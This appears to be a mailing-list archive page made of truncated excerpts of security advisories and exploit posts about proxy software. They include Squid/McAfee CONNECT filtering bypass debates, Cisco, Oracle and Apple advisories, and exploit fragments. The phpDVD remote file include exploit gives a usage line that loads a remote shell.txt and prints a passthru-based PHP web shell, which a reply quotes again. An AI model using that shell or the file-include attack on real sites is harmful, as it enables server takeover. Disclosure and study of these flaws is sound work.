
proxy

RE: Squid URL Filtering Bypass

To be clear, the CONNECT request is a single request/response cycle between the client and the proxy.  Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic).  There is nothing that explicitly disallows inclusion of the host header in a CONNECT request.  Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.

The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.

Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).

Also, whether the McAfee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.


Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

following features is affected:

  * Secure Socket Layer Virtual Private Network (SSL VPN)
  * When the affected device is configured to accept Cisco Adaptive
    Security Device Manager (ASDM) connections
  * TLS Proxy for Encrypted Voice Inspection
  * Cut-Through Proxy for Network Access when using HTTPS

SSL VPN (or WebVPN) is enabled with the "enable <interface name>"
command in "webvpn" configuration mode. SSL VPN is disabled by default.
The following configuration snippet provides an example of an SSL VPN

CVE-2008-2625: Oracle DBMS – Proxy Authentication Vulnerability

Oracle is a widely deployed Database Management System (DBMS) that supports a variety of applications. Many multi-tier applications are designed to use proxy authentication, in which a middle tier establishes the database connection on behalf of the users. The standard authentication mechanism requires the client, the middle tier in this case, to provide valid credentials in order to authenticate and connect to the DBMS. User sessions are then created through the proxy connection. Oracle TNS protocol messages are used for session setup, authentication and data transfer.


Scope

Imperva’s Application Defense Center (ADC) conducts extensive research on enterprise applications and databases. During its research, the team has identified a vulnerability in Oracle’s proxy authentication and access control mechanism. 


Findings


Re: Squid URL Filtering Bypass

What I understand from the advisory is the Squid proxy is basing its
filtering on the Host header when present, even for the CONNECT
command which doesn't allow this header at all as it makes no sense. I
haven't confirmed the bug but what's being described is definitely a
vulnerability.

There's also a small misconception in what you said. The proxy will
see the entire CONNECT request, headers and all - after the request
headers there'll be a pair of newlines, and only *then* the remaining
data is tunneled transparently. So it's the second request's headers

Re: Squid URL Filtering Bypass

In McAfee Web Gateway it is possible to convert GET methods into CONNECT
methods, and after the connection, send the same GET packet, without
modification and without cryptography. Even with the GET packets
passing through the proxy without cryptography and with the Host field
pointing to a filtered site, the proxy will accept them.
I think it is a vulnerability!
See my python code.

Thanks


Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and ASA Appliances

The PIX and ASA security appliances are also affected by a crafted TLS
packet vulnerability that affects devices running certain 7.x software
versions if the software has one or more features configured that cause
TLS sessions to terminate on the PIX or ASA security appliance. These
functions include, but are not limited to, clientless WebVPN, HTTPS
management, cut-through proxy for network access, and TLS proxy for
encrypted voice inspection. Version 6.3.x is not affected. Features that
cause TLS sessions to terminate on the PIX and ASA security appliances
are not enabled by default. For specific affected versions, please refer
to the "Software Versions and Fixes" section.


3proxy 0.5.3j released (bugfix)

3proxy ( http://3proxy.ru/ ) is a multi-platform (Windows, Linux, Unix)
multi-protocol proxy server with the ability to manage traffic flows and
bandwidth, convert requests between different proxy types,
authenticate, authorize, control, limit and account users' access and
more.

3proxy version 0.5.3j was released to address a double free()
vulnerability in the FTP proxy module (ftppr) reported by Venustech AD-LAB
(CVE-2007-5622). Vulnerable 3proxy versions are 0.5 - 0.5.3i. Current

Re: Squid URL Filtering Bypass

A forward proxy server when presented with a CONNECT request is solely responsible for attempting to facilitate an end-to-end encrypted path between the requesting client and the far end server. The CONNECT method does no more than create a temporary hole in your firewall.

Only once that is done is a normal HTTP request, including headers such as the Host: header, passed over the encrypted path by the client. Most crucially, the proxy server cannot see the HTTP request or its headers due to the end-to-end encryption. You can use the encrypted path to carry any protocol or data you like and the proxy server is quite oblivious to it as it is opaque to the proxy.

The only access control that the proxy server can perform is based on the CONNECT method request and the server identified in it by either IP number or FQDN and port.

You do not say what the acl is that you have asked Squid to apply but it cannot involve any examination of the Host: header of a request if the CONNECT method is used; only the far end server can see that.

The same conclusion also applies to your other post about a vulnerability with "McAfee Web Gateway URL Filtering Bypass".


Cisco Security Advisory: Multiple Vulnerabilities in Cisco Firewall Services Module

The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500
Series switches and Cisco 7600 Series routers is affected by the
following vulnerabilities:

  * Syslog Message Memory Corruption Denial of Service Vulnerability
  * Authentication Proxy Denial of Service Vulnerability
  * TACACS+ Authentication Bypass Vulnerability
  * Sun Remote Procedure Call (SunRPC) Inspection Denial of Service
    Vulnerabilities
  * Internet Locator Server (ILS) Inspection Denial of Service
    Vulnerability

Cisco Security Advisory: Multiple Vulnerabilities in Cisco PIX and Cisco ASA

The following list contains some of the applications within the Cisco
ASA and Cisco PIX devices that use TLS:

  * Clientless WebVPN, SSL VPN Client, and AnyConnect Connections
  * ASDM (HTTPS) Management Sessions
  * Cut-Through Proxy for Network Access
  * TLS Proxy for Encrypted Voice Inspection

Clientless WebVPN, SSL VPN Client, and AnyConnect Connections
+------------------------------------------------------------


Related POC for JCE Joomla Extension <=2.0.10 Multiple Vulnerabilities

          </font><input type="file" name="datafile" size="40"><font  
color="#FF0000"> * </font>
           <p><font color="#00ff00" >  specify a port (default is 80):  
             </font><input name="port" size="20"><span  
class="Stile5"></span></p>
           <p><font color="#00ff00" >  Proxy (ip:port):                 
                  </font><input name="proxy" size="20"><span  
class="Stile5"></span></p>
           <p align="center"> <span class="Stile5"><font  
color="#FF0000">* </font><font color="white" >fields are  
required</font></font></span></p>

Proxy bypass vulnerability & plain text passwords in LevelOne AMG-2000

SEC Consult Security Advisory < 20090429-0 >
=======================================================================
              title: Proxy bypass vulnerability & plain text passwords
                     in LevelOne AMG-2000
            product: LevelOne AMG-2000 Wireless AP Management Gateway 
 vulnerable version: Firmware <=2.00.00build00600                     
             impact: critical
           homepage: http://www.level1.com
              found: 2008-12-16
                 by: J. Greil / SEC Consult / www.sec-consult.com

PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version

upload:           </font></br><input type="file" name="datafile"  
size="40"><font color="#FF0000"> * </font>
           <p><font color="#FFF8C6" >  specify a port (default is 80):  
             </font></br><input name="port" size="20"><span  
class="Stile5"></span></p>
           <p><font color="#FFF8C6" >  Proxy (ip:port):                 
                  </font></br><input name="proxy" size="20"><span  
class="Stile5"></span></p>
           <p align="center"> <span class="Stile5"><font  
color="#FF0000">* </font><font color="white" >fields are  
required</font></font></span></p>

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

RIP Denial of Service Vulnerability
+----------------------------------

A denial of service vulnerability affects the RIP implementation in
Cisco ASA 5500 Series Adaptive Security Appliances when both RIP and
the Cisco Phone Proxy feature are enabled on the same device. The
following example displays an affected configuration (Cisco ASA
Software version 8.0 and 8.1):

    router rip
     ...

phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit

host:      script server (ip/hostname)
shell:     path to shell
cmd:       a shell command (ls -la)
Options:
-p[port]:    specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');

Re: phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit

> host:      script server (ip/hostname)
> shell:     path to shell
> cmd:       a shell command (ls -la)
> Options:
> -p[port]:    specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir
> www.mefistolabs.com";ini_set("max_execution_time",0);echo
> "mefistolabs";passthru($_GET["cmd"]);die;?>

at32 ReverseProxy - Multiple HTTP Header Field Denial Of Service Vulnerability

Title: at32 Reverse Proxy -  Multiple HTTP Header Field Denial Of Service Vulnerability

Product : at32 Reverse Proxy

Version : v1.060.310

Vendor: http://www.at32.com/doc/rproxy.htm

Class:  Boundary Condition Error  


n.runs-SA-2010.002 - Alcatel-Lucent - arbitrary code execution on OmniVista 4760

____________________________________________________________________________

Overview:
--------
Part of the Alcatel Omnivista 4760 administration software of the Alcatel
4400 PBX is an HTTP proxy. It is used to tunnel ssh-connections to the
ssh-ports of the PBX within the internal network.
This proxy is vulnerable to a remote buffer overflow.

Description:

Corrections about Squid/McAfee URL Filtering Bypass

The latest default configuration of Squid blocks CONNECT methods for
all ports but 443. McAfee allows CONNECT for 80 and 443.
So the tests I made with the Host header work ONLY for McAfee Web Gateway
and the translation of GET methods to CONNECT methods will work ONLY
for McAfee, because Squid blocks CONNECT for port 80. But, if the
proxy allows this kind of connection, the proxy can be vulnerable (to
translation of the HTTP methods).
Sorry for the misunderstanding.

SSL CONNECT Translation Attack (Hostname to IP address):
McAfee Web Gateway 7: Vulnerable

Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.

Name:                      Mod_proxy from apache 1.3 - Integer overflow which causes heap overflow.
Author:                    Adam Zabrocki (<pi3@itsec.pl> or <zabrocki@cern.ch>)
Date:                      Jan 27, 2010


   Issue:

Mod_proxy from apache 1.3.xx (tested on the latest version, 1.3.41) allows local and remote attackers
to overflow a buffer on the heap via an integer overflow vulnerability.


KwsPHP (Upload) Remote Code Execution Exploit

 * CONTACT:        gmdarkfig@gmail.com (french / english)
 * GREETZ:         Sparah, Ddx39
 *
 * DESCRIPTION:
 * The phpsploit is a class implementing a web user agent.
 * You can add cookies, headers, use a proxy server with (or without)
 * basic authentication. It supports the GET and the POST method. It can
 * also be used like a browser with the cookiejar() function (which allows
 * a server to add several cookies for the next requests) and the
 * allowredirection() function (which allows the script to follow all
 * redirections sent by the server). It can return the content (or the

iDefense Security Advisory 10.14.08: Sun Java Web Proxy Server FTP Resource Handling Heap-Based Buffer Overflow

I. BACKGROUND

Sun Microsystems Inc's Java System is a collection of server
applications bundled together. One such server application included is
the Web Proxy Server. This software implements proxy services including
HTTP and SOCKSv5.

For more information, visit
http://www.sun.com/software/products/web_proxy/home_web_proxy.xml.


Apple Airport Wireless Products: Promiscuous FTP PORT Allowed in FTP Proxy Provides Security Bypass

The FTP proxy used in Apple's Airport Express, Airport Extreme, Time Capsule and possibly elsewhere doesn't check the client-provided address and port given by the FTP PORT command against the IP address of the connecting client, or against the use of privileged ports.  (The FTP PORT command is used by an FTP client to tell an FTP server which address and data port to initiate the data connection on.)  The FTP proxy is used to provide assistance to clients operating in NAT environments served by the Apple products.  FTP servers running behind a NAT with this assistance can have addresses in the command channel rewritten for them so that external clients can reach them when operating in passive mode.  The ALG operates as a proxy server, assuming responsibility for connections to the FTP server, and must therefore also handle and modify rewriting of the PORT command.  It looks like it might be ftp-proxy from PF.

The effect of this problem is to allow anybody with access to the FTP port forwarded on the exterior side of an Apple Airport product that offers NAT to internal clients, which for a publicly-accessible FTP server is the big bad world, to induce an FTP server operating behind a NAT to send data to arbitrary addresses and ports.  This is true even if the FTP server is configured to operate more securely, since it sees connections from the NAT's exterior interface, not the connecting client.  This is useful for bouncing anonymous port scans off the victim NAT, or if data is available or can be written to and then read from the FTP server, potentially for anonymous attacks, spam, news floods, and other such badness.  Any trust relationship and/or security implied or assumed by a NAT is also gone, since the PORT command can also specify private addresses, inside the NAT, for victimisation.  Best of all, the gateway itself makes no log entry concerning FTP connections that have been run through the proxy.

Workarounds: do not use FTP; do not trigger the use of the ALG (FTP proxy) by explicitly using ports other than 21 on the inbound port mapping.  If you can't do those things, you can avoid the worst effects of this attack by disabling FTP uploads that can later be downloaded by anonymous users.

Apple likes to keep secrets for the protection of its customers.  Since the reasonable release of this advisory removes that protection, confidential information vouchsafed to me can be safely disclosed with no ill effects.  Apple has a fix, and according to its last seemingly automatic template message, they are still testing it and do not know precisely when it will be released.  This is confidential information.  DO NOT DISCLOSE!

Advisory history:


FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit // www.MefistoLabs.com

   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);

Cisco Security Advisory: Cisco Unified IP Phone Overflow and Denial of Service Vulnerabilities

    telnet server on vulnerable phones. This vulnerability is
    corrected in SIP firmware version 8.8(0). This vulnerability is
    documented in CVE-2008-0529 and Cisco Bug ID CSCsj78359.

  * SIP Proxy Response Overflow

    Cisco Unified IP Phone 7940, 7940G, 7960 and 7960G devices
    running SIP firmware contain a heap overflow vulnerability in the
    handling of a challenge/response message from a SIP proxy. If an
    attacker controls the SIP proxy to which a vulnerable phone is

Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)

Crashing ZoneAlarm 8.0.020.000 by Checkpoint (Component : TrueVector)
==========================================

- Keep ZoneAlarm 8 running with vsmon.exe running (which runs by default)

- On System A : Run the rogue proxy (attached) za_crasher_proxy.exe and set a port number (eg: za_crasher_proxy.exe 5938)

- On System B : Use Internet Explorer 6 and set proxy settings as IP of System A and port 5938 for HTTP connections
By default IE 6 has homepage as 
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
Leave it unchanged.

Re: Squid URL Filtering Bypass

On 17/04/2012 10:11 a.m., Gabriel Menezes Nunes wrote:
> # Exploit Title: Squid URL Filtering Bypass
> # Date: 16/04/2012
> # Author: Gabriel Menezes Nunes
> # Version: Squid Proxy
> # Tested on: Squid Proxy 3.1.19
> # CVE: CVE-2012-2213
>
>
> I found a vulnerability in Squid Proxy that allows access to filtered sites.

Re: facebook 'routing flaw'?

have hit it by now especially on networks that have their IP address 
allocated dynamically.

So Probability of this being the reason: Very Low

2. AT&T is using a proxy caching server and the authentication cookies 
used by Facebook were stored on the proxy server.

If a proxy server was being used by AT&T then when a request went out to 
Facebook it would check for a valid session using the server’s IP 
address and then check for an authentication cookie on that server. If 

[ GLSA 200907-04 ] Apache: Multiple vulnerabilities

* Jonathan Peatfield reported that the "Options=IncludesNoEXEC"
  argument to the "AllowOverride" directive is not processed properly
  (CVE-2009-1195).

* Sander de Boer discovered that the AJP proxy module (mod_proxy_ajp)
  does not correctly handle POST requests that do not contain a request
  body (CVE-2009-1191).

* The vendor reported that the HTTP proxy module (mod_proxy_http),
  when being used as a reverse proxy, does not properly handle requests


Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
